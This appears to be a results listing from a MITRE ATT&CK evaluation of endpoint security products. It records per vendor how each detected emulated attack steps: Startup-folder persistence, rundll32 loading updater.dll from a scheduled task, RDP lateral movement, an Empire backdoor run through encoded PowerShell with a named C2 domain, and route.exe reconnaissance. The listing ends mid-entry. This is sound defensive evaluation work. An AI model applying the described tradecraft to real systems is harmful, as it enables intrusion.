Telemetry
Telemetry showed cmd.exe starting rundll32.exe, which started update.dat, as well as cmd.exe executing autoupdate.bat from the Startup folder. [1] [2] [3]
McAfee
Telemetry
Telemetry showed cmd.exe executing autoupdate.bat from the Startup folder, then update.dat via rundll32.exe. [1] [2]
Microsoft
Telemetry
Telemetry showed the execution sequence of cmd.exe executing autoupdate.bat from the Startup folder to start update.dat. [1] [2]
Palo Alto Networks
Telemetry
Telemetry showed cmd.exe executing autoupdate.bat from the Startup folder. [1] [2] [3]
RSA
Telemetry
Telemetry showed cmd.exe executing autoupdate.bat from the Startup folder. [1] [2]
SentinelOne
Telemetry
Telemetry showed execution of autoupdate.bat from the Startup folder for persistence. The telemetry was associated to a new story (Group ID) but was not marked as malicious or tainted because it is not associated with an alert. [1] [2] [3]
Carbon Black
Telemetry
Telemetry within the process tree showed rundll32.exe executing updater.dll with a parent of svchost.exe running with command-line arguments \"-k netsvcs -p -s Schedule\". [1] [2] [3] [4]
CrowdStrike
Telemetry (Tainted)
Telemetry showed rundll32.exe starting updater.dll. The telemetry was tainted by the parent OverWatch alert. [1] [2] [3] [4]
Cybereason
Telemetry (Tainted)
Telemetry showed rundll32.exe executing update.dat with command-line arguments. The telemetry was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4]
Endgame
Telemetry (Tainted)
Telemetry within the event tree showed rundll32.exe executing updater.dll. The telemetry was tainted by a Malicious File Detection alert for updater.dll and a Process Injection alert. [1] [2] [3] [4] [5]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified the Resume Viewer Update Checker scheduled task executing updater.dll with rundll32.exe. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed svchost.exe executing rundll32.exe, which executed updater.dll. The telemetry was tainted by the parent Rundll32 Execution alert, which was tagged with a related ATT&CK Technique (T1085 - Rundll32) and Tactic (Defense Evasion, Execution), but did not include information on the use of a Scheduled Task specifically. [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed rundll32.exe executing updater.dll. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry showed svchost.exe executing rundll32.exe, which executed updater.dll. The telemetry was tainted by the parent \"Sponsor process started V2\" alert. [1] [2]
McAfee
Telemetry
Telemetry showed rundll32.exe executing updater.dll with a parent of svchost.exe running with command-line arguments "-k netsvcs -p -s Schedule". [1] [2] [3]
Microsoft
Telemetry
Telemetry showed the execution sequence for rundll32.exe executing updater.dll with a parent of svchost.exe running with command-line arguments \"-k netsvcs -p -s Schedule\". [1] [2] [3]
Palo Alto Networks
Telemetry
Telemetry showed the execution sequence for rundll32.exe executing updater.dll with a parent of svchost.exe running with command-line arguments "-k netsvcs -p -s Schedule". [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed rundll32.exe executing updater.dll. [1] [2]
SentinelOne
Telemetry
Telemetry showed rundll32.exe executing updater.dll as part of the scheduled task persistence. The telemetry was associated with the execution of autoupdate.bat for persistence because it was associated with the same story (Group ID) but is not marked as malicious or tainted because it is not associated with an alert. [1] [2] [3]
Carbon Black
Enrichment
The capability enriched rdpclip.exe with the correct ATT&CK Technique (Remote Desktop Protocol). [1] [2] [3] [4] [5]
Telemetry
Telemetry within the process tree showed rdpclip.exe execution by the user Jesse on the destination system of the RDP connection. [1] [2] [3] [4] [5]
CrowdStrike
Telemetry
Telemetry showed a type 10 (interactive) UserLogon event for Jesse. [1] [2] [3] [4]
Cybereason
Telemetry
Telemetry showed the logon session for Jesse to Conficker (10.0.0.5) as a Remote Interactive Logon Type. [1] [2] [3]
Endgame
Telemetry (Tainted)
Telemetry showed that the userinit.exe process was running as the user Jesse, indicating Jesse logged in. The telemetry was tainted by the parent \"Start Folder Persistence\" alert. [1] [2] [3] [4] [5]
FireEye
Telemetry
Telemetry showed a Logon Type 10 (interactive) event for the account Jesse logging on to Conficker. [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the account Jesse was used to log in to Conficker as part of Lateral Movement. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed a remote interactive logon event for the account Jesse logging on to Conficker (10.0.0.5) over port 3389. [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry
Telemetry showed that the explorer.exe process was running as the user Jesse, indicating the account exists. [1] [2] [3] [4]
McAfee
Telemetry
Telemetry showed a remote interactive logon for Jesse to Conficker (10.0.0.5). [1] [2] [3] [4]
Microsoft
Telemetry
Telemetry showed the new local user account Jesse logging into Conficker. [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Telemetry
Telemetry showed userinit.exe as well as explorer.exe spawn as the user Jesse. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed \"unregmp2.exe /FirstLogon\" (associated with user logon) as well as the user name \"Jesse J\" within Machine Properties. [1] [2] [3] [4]
SentinelOne
Telemetry
Telemetry showed the Jesse account had logged into the system. [1] [2] [3] [4]
Carbon Black
Telemetry
Telemetry within the process tree showed rdpclip.exe execution by the user Jesse on the destination system of the RDP connection. [1] [2] [3] [4] [5]
Enrichment
The capability enriched rdpclip.exe with the correct ATT&CK Technique (Remote Desktop Protocol). [1] [2] [3] [4] [5]
CrowdStrike
Telemetry
Telemetry showed the remote connection to Conficker for a user logon by Jesse with type 10 (interactive) as well as the use of rdpclip.exe by the logged-on user. [1] [2] [3] [4] [5] [6] [7]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior occurred because they observed suspicious communications over 3389 (RDP) to other hosts. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
Cybereason
Telemetry (Tainted)
Telemetry showed the logon session for Jesse to Conficker (10.0.0.5) as a Remote Interactive Logon Type. Telemetry also showed a connection over port 3389 to Conficker (10.0.0.5) through rundll32.exe serving as a proxy. The telemetry was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry
Telemetry showed a Type 10 logon event (corresponding to interactive) for Jesse as well remote connections over port 3389 to 10.0.0.5 (Conficker). [1] [2] [3] [4] [5]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified the user account Jesse logged on to Conficker via Remote Desktop Protocol. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched a TCP port 3389 connection to 10.0.0.5 (Conficker) with the alert RDP Network Connection (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1076 - Remote Desktop Protocol) and Tactic (Lateral Movement). [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed a Logon Type 10 (interactive) event for the account Jesse logging on to Conficker. [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed a remote interactive logon event for the account Jesse logging on to Conficker (10.0.0.5) over port 3389. [1] [2] [3]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability enriched a TCP port 3389 (RDP) connection to 10.0.0.5 (Conficker) with the conditions Lateral Movement and Remote Share Access. One connection event was tainted by the parent \"Windows command prompt invoked\" alert. The conditions contributing to Enrichment were added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4]
McAfee
Enrichment
The capability enriched the rundll32.exe that made the network connection with the correct ATT&CK Tactic (Lateral Movement) and Technique (Remote Desktop Protocol). [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showed a remote interactive logon for Jesse to Conficker (10.0.0.5) as well as a connection to 10.0.0.5 (Conficker) over port 3389 from rundll32.exe. The telemetry was tainted by a trace detection on rundll32.exe [1] [2] [3] [4] [5]
Microsoft
Telemetry
Telemetry showed a successful connection to Conficker (10.0.0.5) over port 3389 from rundll32.exe. [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Enrichment
The capability enriched the network connection over port 3389 with the correct ATT&CK Technique (Remote Desktop Protocol). [1] [2] [3] [4] [5]
Telemetry
Telemetry showed a successful incoming connection to Conficker (10.0.0.5) over port 3389. [1] [2] [3] [4] [5]
RSA
None
No detection capability demonstrated for this procedure. [1]
SentinelOne
Telemetry (Tainted)
Telemetry from Nimda showed a TCP port 3389 connection from 10.0.1.6 (Nimda) to 10.0.0.5 (Conficker). The rundll32.exe process (PID 184) that was used to load updater.dll was used to proxy the RDP connection to Conficker. The telemetry was tainted by the activity generated during the privilege escalation step because it was associated with the same story (Group ID). [1] [2] [3]
Carbon Black
Specific Behavior
A Specific Behavior Alert was generated indicating that powershell.exe was a suspicious child process of wscript.exe. [1] [2] [3] [4] [5] [6] [7]
Telemetry
Telemetry of a process tree showed powershell.exe execution, including full command-line arguments. [1] [2] [3] [4] [5] [6] [7]
Specific Behavior
A Specific Behavior alert was generated indicating that powershell.exe was executed with encoded command-line arguments. [1] [2] [3] [4] [5] [6] [7]
Enrichment
The capability enriched wscript.exe and powershell.exe with the correct ATT&CK Techniques (T1063 - Scripting, T1086 - Powershell). [1] [2] [3] [4] [5] [6] [7]
CrowdStrike
Telemetry
Telemetry within the OverWatch alert showed wscript.exe executing launcher.vbs, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
A General Behavior alert was generated from OverWatch indicating wscript.exe executing launcher.vbs was suspicious. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating a Specific Behavior was observed because a malicious script invoked by wscript was run by Bob on CodeRed and launched PowerShell. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior
A Specific Behavior alert was generated indicating "A PowerShell script launched that shares characteristics with known PowerShell exploit kits." [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry (Tainted)
Telemetry showed powershell.exe execution, including decoded full command-line arguments, as well as wscript.exe executing autoupdate.vbs. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior
A Specific Behavior alert was generated for powershell.exe, labeled with Command and Control as well as Malicious use of PowerShell. The alert was tagged as a Obfuscated PowerShell payload and mapped to the correct ATT&CK Tactic (Execution) and Technique (PowerShell) [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry (Tainted)
Telemetry showed the process events associated with wscript.exe executing the autoupdate.vbs script (tainted by parent alert). [1] [2] [3] [4] [5] [6] [7]
Specific Behavior
A Specific Behavior alert was generated for "Windows Script Executing PowerShell" due to wscript.exe launching powershell.exe. The alert was mapped to the correct ATT&CK Technique (T1064 - Scripting) and Tactic (Execution). [1] [2] [3] [4] [5] [6] [7]
Specific Behavior
A Specific Behavior alert was generated indicating that powershell.exe ran with unusual arguments due to the -enc and -noP command-line arguments. The alert was mapped to a related ATT&CK Technique (T1086 - PowerShell) and the correct Tactic (Execution). [1] [2] [3] [4] [5] [6] [7]
FireEye
Specific Behavior
A Specific Behavior alert was generated for Suspicious PowerShell Usage (Methodology) indicating powershell.exe ran with unusual arguments due to the -enc and -noP command-line arguments. The alert was mapped to a related ATT&CK Technique (T1086 - PowerShell) and the correct Tactic (Execution) and captured the encoded command. [1] [2] [3] [4] [5] [6] [7]
Indicator of Compromise
An Indicator of Compromise alert was generated for EMPIRE RAT (Backdoor) based on a detected string specific to the backdoor. The alert was also mapped to a related ATT&CK Technique (T1086 - PowerShell). [1] [2] [3] [4] [5] [6] [7]
Enrichment
The capability enriched wscript.exe with an alert for Wscript Execution (Weak Signal). The alert was tagged with the correct ATT&CK Technique (T1064 - Scripting) and Tactic (Execution). [1] [2] [3] [4] [5] [6] [7]
F-Secure
Enrichment
The capability enriched wscript.exe executing powershell.exe with a tag indicating that wscript executed code. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated for PowerShell executing a long, encoded command. [1] [2] [3] [4] [5]
Telemetry
Telemetry showed wscript.exe executing autoupdate.vbs and subsequently powershell.exe. [1] [2] [3] [4] [5]
GoSecure
Telemetry (Tainted)
Telemetry showed wscript.exe executing autoupdate.vbs and that wscript.exe created a powershell.exe process, including the encoded command-line arguments (tainted by the parent Script File Created alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4]
McAfee
Enrichment
The capability enriched powershell.exe with the correct ATT&CK Tactic (Execution) and Techniques (PowerShell) and a suspicious indicator that a PowerShell command was executed. [1] [2] [3] [4] [5]
Enrichment
The capability enriched wscript.exe with the correct ATT&CK Tactics (Defense Evasion, Execution) and Techniques (Scripting, PowerShell) and a suspicious indicator that the VBScript interpreter was executed. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated for PowerShell execution with a very long command line. The alert was tagged with correct ATT&CK Tactics (Defense Evasion, Execution) and Techniques (Scripting, PowerShell). [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated for the VBScript interpreter launching a suspicious PowerShell process. The alert was tagged with the correct ATT&CK Tactics (Defense Evasion, Execution) and Techniques (Scripting, PowerShell). [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showed wscript.exe (executing autoupdate.vbs) then spawning powershell.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated for decoding and running encoded scripting sources from another process (wscript.exe). The alert was tagged with correct ATT&CK Tactic (Defense Evasion, Execution) and Techniques (PowerShell). [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated for PowerShell commands being executed from another process (wscript.exe). The alert was tagged with correct ATT&CK Tactic (Execution) and Techniques (PowerShell). [1] [2] [3] [4] [5]
Microsoft
Specific Behavior
A delayed Specific Behavior alert was generated for suspicious PowerShell command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Specific Behavior
A Specific Behavior alert was generated for PowerShell script with malicious cmdlets related to Empire. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Specific Behavior (Delayed)
A Specific Behavior alert was generated for PowerShell script with suspicious content detected through Antimalware Scan Interface extracted content. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Telemetry
Telemetry showed explorer.exe running autoupdate.vbs through wscript.exe and subsequent execution of PowerShell script and cmdlets. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed wscript.exe executing autoupdate.vbs as well as the resulting powershell.exe execution. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Specific Behavior
A Specific Behavior alert was generated for PowerShell execution with base64 encoded commands. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Indicator of Compromise
An Indicator of Compromise alert was generated identifying PowerShell Empire. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Indicator of Compromise
Indicator of Compromise alerts were generated for suspicious PowerShell strings. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Specific Behavior
A Specific Behavior alert was generated for suspicious PowerShell activity [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Specific Behavior
A Specific Behavior alert was generated for PowerShell execution. The alert was tagged with a related Technique (PowerShell) [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Specific Behavior
A Specific Behavior alert was generated for the execution of the windows script engine The alert was tagged with the correct ATT&CK Technique (Scripting). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
RSA
Telemetry
Telemetry showed wscript.exe executing autoupdate.vbs and the subsequent PowerShell child process. Vendor says launch command-line argument truncation resulted in PowerShell not being able to be decoded. [1] [2] [3]
SentinelOne
Telemetry
Telemetry showed wscript.exe executing autoupdate.vbs which then executed powershell.exe with an encoded PowerShell script. [1] [2] [3] [4]
General Behavior
A General Behavior alert was generated for the execution of autoupdate.vbs that was listed as an active threat. [1] [2] [3] [4]
Carbon Black
Enrichment
The capability enriched backgroundtaskhost.exe and powershell.exe with the correct ATT&CK Technique (T1043 - Commonly Used Port). [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed network connections, including over TCP port 443 to www.freegoogleadsenseinfo.com (C2 domain). [1] [2] [3] [4] [5] [6]
CrowdStrike
Telemetry (Tainted)
Telemetry showed powershell.exe making connection to 192.168.0.5 (C2 server) over port 443. The telemetry was tainted by an alert on its parent powershell.exe process. [1] [2] [3] [4]
Cybereason
Telemetry (Tainted)
Telemetry showed powershell.exe making an outgoing connection on TCP port 443 to 192.168.0.5 (C2 Server). Telemetry also showed decoded command-line arguments to perform a HTTPS connection to freegoogleadsenseinfo.com (C2 domain) over port 443. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment (Tainted)
The capability enriched powershell.exe as making a connection over a ”HTTP Port”. The data was tagged with the correct ATT&CK Technique (Commonly Used Port) and Tactic (Command and Control) and was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry (Tainted)
Telemetry showing the decoded powershell.exe command-line arguments showed a connection over port 443 to www.freegoogleadsenseinfo.com (C2 domain) (tainted by parent alert). [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior (Tainted)
A Specific Behavior alert for "PowerShell Making Network Connections" was triggered due to powershell.exe making a connection over port 443. The alert was tainted by a parent alert and mapped to the correct ATT&CK Tactic (Command and Control). [1] [2] [3] [4] [5] [6] [7] [8]
FireEye
Telemetry (Tainted)
Telemetry showed powershell.exe communicating over TCP port 443. The telemetry was tainted by the parent PowerShell Network Connection alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified that the Empire backdoor communicated with 192.168.0.5 (C2 server) over port 443. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
F-Secure
Telemetry
Telemetry showed a network connection over port 443 to www.freegoogleadsenseinfo.com (C2 domain). [1] [2] [3]
GoSecure
Telemetry
Telemetry showed powershell.exe creating an outbound connection to 192.168.0.5 (C2 server) over TCP port 443. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Enrichment
The capability enriched powershell.exe with the correct ATT&CK Tactic (Command and Control) and Technique (Commonly Used Port) and a suspicious indicator that powershell.exe accessed a known TCP port. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated for PowerShell sending and receiving information through port 443. The alert was tagged with the correct ATT&CK Tactic (Command and Control) and Technique (Commonly Used Port). [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showed port 443 network connections to www.freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5]
Microsoft
Telemetry (Tainted)
Telemetry showed powershell.exe checking an SSL certificate and then communicating to 192.168.0.5 (C2 server) over port 443 (tainted by relationship to alert on PowerShell script with suspicious content). Telemetry within an alert also showed decoded command-line arguments containing port 443. [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed port 443 network connections to www.freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent alert on wscript.exe. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1] [2] [3] [4] [5] [6] [7]
Enrichment (Tainted)
The capability enriched the port 443 network connection with the correct ATT&CK Technique (Commonly Used Port). The data was tainted by a parent alert on wscript.exe. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1] [2] [3] [4] [5] [6] [7]
General Behavior (Tainted)
General Behavior alerts were generated for PowerShell making network connections to the internet as well as Wscript connecting to an external network. The alerts were tainted by a parent alert on wscript.exe. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1] [2] [3] [4] [5] [6] [7]
RSA
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection over port 443 and to letsencrypt.org (no protocol was identified for this traffic). [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed network connections to 192.168.0.5 (C2 server) over TCP port 443. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3]
Carbon Black
Telemetry
Telemetry showed modload events importing dynamic libraries usually used for HTTP and SSL communication (e.g. winhttp.dll), followed by a CRL check to a CA, indicating that HTTPS was likely used. [1] [2] [3]
CrowdStrike
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over port 443 (no protocol was identified for this traffic). [1] [2] [3] [4] [5] [6]
Cybereason
Telemetry (Tainted)
Telemetry showed decoded command-line arguments to perform a HTTPS connection to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent PowerShell alert. Telemetry also showed that powershell.exe had an outgoing connection on port 443, identified as HTTP type traffic. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Telemetry (Tainted)
Telemetry showing the decoded powershell.exe command-line arguments showed a connection to over HTTPS to www.freegoogleadsenseinfo.com (C2 domain) (tainted by parent alert). Telemetry also showed a connection to letsencrypt.org, which could indicate use of a cert for HTTPS. [1] [2] [3] [4] [5]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified that the Empire backdoor was configured to communicate with freegoogleadsenseinfo.com (C2 domain) over HTTPS. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed powershell.exe making a connection over port 443 to freegoogleadsenseinfo.com (C2 domain). There was an alert for PowerShell downloading significant amount of data using HTTP(S), though this alert was based only on the port (443). [1] [2] [3] [4] [5]
GoSecure
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection over TCP port 443 (no protocol was identified for this traffic). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4]
McAfee
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over port 443 (no protocol was identified for this traffic) and an alert than indicated that powershell.exe queried registered cryptographic provider libraries. [1] [2] [3] [4] [5]
Microsoft
Telemetry (Tainted)
Telemetry showed powershell.exe checking an SSL certificate and then communicating to 192.168.0.5 (C2 server) over an encrypted channel (tainted by relationship to alert on PowerShell script with suspicious content). Telemetry within an alert showed decoded command-line arguments to perform HTTPS connection to C2 domain. [1] [2] [3] [4] [5]
Indicator of Compromise (Configuration Change)
An Indicator of Compromise alert was generated on the C2 domain. Vendor added detection for evaluation C2 domain using the standard customer-facing custom detection capabilities of the product. [1] [2] [3] [4] [5]
Palo Alto Networks
None
No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1] [2]
RSA
Telemetry
Telemetry showed powershell.exe making a connection over port 443 to freegoogleadsenseinfo.com (C2 domain). [1] [2]
SentinelOne
None
No detection capability demonstrated for this procedure. Telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over TCP port 443 (no protocol was identified for this traffic). Vendor stated log files indicate the powershell process was using the SSL cache folder. [1] [2]
Carbon Black
Telemetry
Telemetry showed modload events importing dynamic libraries usually used for HTTP and SSL communication (e.g. winhttp.dll), followed by a CRL check to a CA, indicating that HTTPS was likely used. [1]
CrowdStrike
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over port 443 (no protocol was identified for this traffic). [1]
Cybereason
Telemetry (Tainted)
Telemetry showed that powershell.exe had an outgoing connection on port 443, identified as HTTP type traffic. Telemetry also showed decoded command-line arguments to perform a HTTPS connection to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent PowerShell alert. [1] [2]
Endgame
Telemetry (Tainted)
Telemetry showing the decoded powershell.exe command-line arguments showed a connection to over HTTPS to www.freegoogleadsenseinfo.com (C2 domain) (tainted by parent alert). Telemetry also showed a connection to letsencrypt.org, which could indicate use of a cert for HTTPS. [1] [2]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified that the Empire backdoor was configured to communicate with freegoogleadsenseinfo.com (C2 domain) over HTTPS. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1]
F-Secure
Specific Behavior
A Specific Behavior alert was generated for PowerShell downloading a significant amount of data using HTTP(S). [1]
GoSecure
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection over TCP port 443 (no protocol was identified for this traffic). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1]
McAfee
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over port 443 (no protocol was identified for this traffic) and an alert than indicated that powershell.exe queried registered cryptographic provider libraries. [1] [2]
Microsoft
Telemetry (Tainted)
Telemetry showed powershell.exe checking an SSL certificate and then communicating to 192.168.0.5 (C2 server) over an encrypted channel (tainted by relationship to alert on PowerShell script with suspicious content). Telemetry within an alert showed decoded command-line arguments to perform HTTPS connection to C2 domain. [1] [2]
Palo Alto Networks
None
No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated.
RSA
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection over port 443 and to letsencrypt.org (no protocol was identified for this traffic). [1]
SentinelOne
None
No detection capability demonstrated for this procedure. Telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over TCP port 443 (no protocol was identified for this traffic). Vendor stated log files indicate the powershell process was using the SSL cache folder. [1]
Carbon Black
Telemetry
Telemetry within the process tree showed powershell.exe executing route.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because route print was part of the basic reconnaissance activity performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed powershell.exe executing route.exe with command-line arguments. The process tree view showed route.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Telemetry (Tainted)
Telemetry showed route.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry (Tainted)
Telemetry showed powershell.exe executing route.exe with command-line arguments (tainted by parent PowerShell alerts). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
FireEye
Enrichment
The capability enriched route.exe with an alert for Route Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1016 - System Network Configuration Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified route.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (route) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched route.exe indicating that it could be used to print the routing table as part of reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Telemetry
Telemetry showed powershell.exe executing route.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
GoSecure
Enrichment (Tainted)
The capability showed powershell.exe executing route.exe with command-line arguments and enriched the command with the conditions Reconnaissance Tool and Route Spawned with Reconnaissance. The enrichment was tainted by the parent Script File Created alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5]
McAfee
Enrichment
The capability enriched route.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery) and a suspicious indicator that routing tables were viewed or manipulated. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed powershell.exe executing route.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for powershell.exe executing route.exe with command-line arguments. The telemetry was tainted by previous "Suspicious sequence of exploration activities" and suspicious PowerShell cmdlet alerts. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Telemetry (Tainted)
